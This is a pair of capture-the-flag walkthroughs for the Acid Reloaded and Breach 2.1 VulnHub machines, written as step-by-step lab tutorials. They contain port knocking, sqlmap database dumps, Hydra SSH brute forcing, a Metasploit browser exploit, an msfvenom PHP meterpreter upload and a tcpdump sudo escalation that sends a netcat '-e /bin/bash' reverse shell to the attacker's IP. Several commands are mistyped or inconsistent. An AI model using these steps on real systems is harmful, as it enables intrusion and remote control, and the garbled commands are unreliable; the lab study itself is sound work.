Hack Acid Reloaded VM (CTF Challenge)

The named of the Virtual machine is "Acid-Reloaded", It is created by Avinash Thappa.  . This Virtual Machine contains both network logics and web logics. You need to extract the rar and run the vmx using VMplayer . The machine has DHCP active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game.

GOAL: Escalate the privileges to root user and capture the flag. Once any one able to beat the box then shoot me a mail

Penerating Methodologies

§  Network scaning (netdiscover, nmap)

§  Port knocking (Netcat)

§  Abousing HTTP web service (Brupsuite)

§  Sqi injection (Sqlmap)

§  SSH Brute-Force (Hydra)

§  Access PTY shell (ssh login)

§  Kernel privlege escalation

Let’s Begin!!

As always start by finding our target

netdiscover

This tells us that our target is 192.168.1.106. Now is time to scan with nmap.

nmap -A 192.168.1.106

The result of nmap shows us that only port 22 is open with the service of SSH. Let’s check out this 22 port.

ssh 192.168.1.106

Wann Knock me out??? Sounds like port knocking hint therefore let’s go for port knocking.

Checking out port 22 hints (3.2.1 let’s Start the Game) we will use netcat Port Knocking technique.

nc 192.168.1.106 3

nc 192.168.1.106 2

nc 192.168.1.106 1

Let’s scan with nmap again.

nmap -p- -A 192.168.1.106

Port knocking helped us to open port 33447 on which the service of HTTP was redirected.

Now open the target IP on browser using this port.

http://192.168.1.106/33447

A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. It’s time to use dirb for directory brute-force attack.

dirb http://192.168.1.106/33447

It put-up so many web directories but to me /bin/ might be interesting as it might have a shell system. No harm in checking it out in browsing so let’s do that.

And it’s a log in portal. Now let’s check its page source.

In the page source there is a directory called: includes/validation.php. I decided to check it out.

Unfortunately! I could not find anything on it. So decided to use DirBuster to find out about directories.

In the DirBuster give the URL and for wordlist use medium 1.0 wordlist. And then click on Start button and it will start finding directories. So it found so many PHP files as shown below.

I checked every directory related to bin and only /bin/dashboard.php was useful. When I opened it in the browser, I found nothing useful so I looked in to the page source and even that proved to be non-useful.

When nothing helped I decided to capture its cookies using BurpSuite. To capture the cookies using BurpSuite, set proxy and then turn on the interception and then simply reload the page. When the cookies are captured just add the following below the Host.

Referer : http://192.168.1.106:33447/bin/includes/validation.php

And now as soon as you will hit the forward button it will automatically log in.

On the page it says to click and when you do that it will redirect to the following page.

There was nothing on the redirected page or its page source. So decided to check for SQl injection, and search for web page with id=1. Luckily we have made right prediction and got following result for id=1.

Using single quote (‘) I check for sql injection and got mysql error message which means the web application is vulnerable to sql injection.

So decided to use SQLMap.

sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 –dbs --tamper=space2comment

We got database name secure_login, now let’s find out tables.

sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 -D secure_login --table  --tamper=space2comment

It shows us the name of the table i.e. UB3R/strcpy.exe

When I opened /UB3R/strcpy.exe in the browser, a dialogue box opened and asked to save a file and so I did.

Now use file command to know more it and found PDF document V 1.5, then used foremost tool which is a forensic tool which is used to recover files using their headers and footers.

file strcpy.exe

foremost strcpy.exe

As soon as you will run the above command a folder is created with the name of output. Let’s check out this folder.

cd output

ls

There is a text file in the folder with the name of audit, I decided to read it through cat command.

cat audit.txt

There is a .rar which I decided to unrar.

unrar x 00000213.rar

On unzipping there are two files that has been extracted i.e. acid.txt and lol.jpg. I decided to read acid.txt

cat acid.txt

This .txt tells us that we are on right path. So ofcourse next I opened lol.jpg

exiftool lol.jpg

But found nothing. So I unzipped it.

unrar e lol.jpg

Unzipping the lol.jpg gave me two files again, one was “hint.txt” and another “Avinash.contact”. So I opened hint.txt which told me to go with Avinash.contact, so I next opened.

cat hint.txt

cat Avinash.contact

There was base64 code given in the file so we decoded the base64 code with help of echo as shown and it turned to be NooB@123.

Syntax: echo Base64 text | base64 -d

And then applied brute force on SSH using the text file that I just created with random words. With help of following command we try to crack password for SSH and successfully obtained two credential for SSH login.

hydra -L user.txt -P NooB@123 -u 192.168.1.106 ssh

And it gave us makke:NooB@123 as username and password respectively. And so I logged in with SSH.

ssh makke@192.168.1.106

Give the password when asked. And when I logged in I checked kernel’s version and tried to download its exploit but it didn’t happen. All the options for downloading were blocked so started exploring.

So I directly went for /bin.

cd /bin

ls

In /bin, there was files called overlayfs. This is a famous exploit so I executed it

./overlayfs

id

ls –la

And then fortunately there was a flag.txt.

cat flag.txt

Hack the Breach 2.1 VM (CTF Challenge)

Breach 2.1 is the second VM in the multi-series Boot2Root CTF challenges. This is developed by mrb3n. It is high-level challenge and shows a lot of scenario including plenty of twists and trolls along the way. It works on a static IP i.e 192.168.110.151 therefore we have configured our adapter to be a host-only adapter.

You can download it from: https://www.vulnhub.com/entry/breach-21,159/

WalkThrough

As our VM is hosted on static IP, there is no need to discover our target we will directly start by scanning our target.

nmap –p- -A 192.168.110.131

Nmap shows us that only three ports are open which are: 111, 52263, 65535 with the services of rpbind, status, SSH respectively. Let’s check SSH port.

ssh 192.168.110.151 –p 65535

Here,

-p = a specified port

Here I gave password “inthesource” because in the area between the hashes it says “Peter, if that’s you – the passowrd is in the source”. It did not work though.  LOL! So I just gave nmap another try and there was port 80 open this time.

Ssh peter@192.168.110.151 –p 65535

As the port 80 just opened, to our luck we can open this in our browser now.

Now on the webpage it says “Welcome to Initech Cyber Consulting. LLC” and something about BEEF. Even in the page source I found nothing so I decided to use DirBuster. It showed me a lot of directories but the one that stole my interest was /blog/.

So I opened it in the browser. It opened a travel blog. There was a search box on the blog so I tried SQL injection by using single inverted comma (‘).

This way I found SQL vulnerability so I used SQLMap next.

Sqlmap –u http://192.168.110.151/blog/index.php?search  --dbs

This command will start the process and it will show you five table names in database.

Out of these five oscommerce is the most famous CMS of e-commerce websites. And this blog was also related to commerce. So I decided to use my next SQLMap command against this table in databse.

Sqlmap –u http://192.168.110.151/blog/index.php?search= --dbs –D oscommerce –tables --dump

Execution of this command will give you username and password. The username is admin but the password that you will receive will be MD5 hash value.

You can crack this MD5 hash value using any third party or you can use an online method like I did.

Upon cracking the password you will get here is 32admin. Now I have usernames and password but I do not have a log in portal. So I started exploring the blog but couldn’t find anything. So cooped and pasted it copyright information on google.

And upon search the google I found the first link of exploit-db.com that means there is an exploit for the said. And that’s why I opened the linked and explored it.

In the exploit there was information about XSS code and a link was provided. Now I know that BEEF does XSS work and on the very first webpage too there was something about BEEF. So naturally I started working with BEEF.

Now BEEF automatically gives us a script which includes a link. I copied that link and opened the BEEF panel in the browser.

Here, go to register option and paste the copied link in the username area and give and random password and email.

As you can see BEEF will give you a session.

From the entire cross sitting details BEEF have to show please pay close attention to the browser. You will find that our target is using FireFox 15.0 and fortunately there is an exploit for this in metasploit.

Now, open metasploit and type the following command to use the said expoit :

use exploit/multi/browser/firefox-proto_crmfrequest

set paypload generic/shell_reverse_tcp

set srvhost 192.168.110.128

set uripath shell

set lhost 192.168.110.128

exploit

Performing this exploit will give you and URL like in my case URL is http://192.168.100.128:4444:8080/shell. Copy this link and go to the BEEF panel. In the BEEF panel go to the Commands tab > Hooked Domain > Redirect Browser. Paste the copied link here in the Redirect URL text box.

As you follow the above steps you will have a shell session.

Now here is trick, you will lose the session as you as you will get it. Here you will have to tranfer you shell session to meterpreter session within 5 seconds and for that type :

use post/multi/manage/shell_to_remember

set session 1

run

And you will have a session. Open that session and you will reach the terminal. In the terminal lets check out the home folder.

cd /home

ls

In the home folder you will three folders i.e. bill, milton, peter. It was not of much use so went ahead and and checked network status.

netstat -tln

Checking the network status gave me some co-ordinates. So I checked them on Google map and found that it was the co-ordinates of Houston. Now this Houston word can be a password or username so I just made a mental note of it for later use.

Except this I found nothing so used Telnet to just get a reply and for that used the following command :

telnet 127.0.0.1 2323

This time it replied with a question i.e. whose stapler is it? Now I don’t know the answer so I just pressed enter. So to know the answer I wanted to search Milton user. And for this, commands are:

find /usr –user milton

cat /usr/local/bin/cd.py

Now in the python file it showed me the programming and as you can see in the image you the coding shows that correct answer “mine”.

So, I repeated my steps to reach the same question. And gave the answer as mine

Then I checked status of network and observed that port 8888 opened.

I checked this port in browser and found two directories.

Out of these I opened oscommerce link and the following page opened.

I had the username and password for this CMS so I Google its admin page and logged in with the admin as username and admin as password.

Note: we have cracked the MD5 value of password that resulted in 32admin but here is is no use of 32. The password is admin.

It logged in but to upload the malicious code you have to follow the path is: file manage > includes > work.  Here you have to upload your php code.

To generate the code go to the terminal in Kali and type:

Msfvenom –p php/meterpreter/reverse-tcp lhost-192.168.110.128 lport=8443 –f raw

Copy to die(); and save it in a .php document.

Before running the file goes to mestaspoit and start multi/handler.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.110.128

set lport 8443

exploit

It will give you the meterpreter session and then type the combination of following commands to reach terminal :

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

id

Next type :

/var/www/html2/oscommerce/includes/work

Still we haven’t reached root but we found blumbergh, let’s see what privileges it has.

sudo –l

Ok. So it saya that it can rum a tcpdump file as root. That’s interesting. To manipulate tcpdump I need to run a set of following comands:

Echo $’id\n/bin/netcat 192.168.110.128 443 –e /bin/bash’ > /tmp/.test

Chmod +x /tmp/.test

Sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root

Tough part is over! Now I just need to run netcat :

nc –nlvp 443

Let’s confirm if we have reached root or not and if yes, let’s see what it has to offer :

id

cd /root

ls

There ia flag.py file in /root. So no waiting. Lets capture the flag.

python .flag.py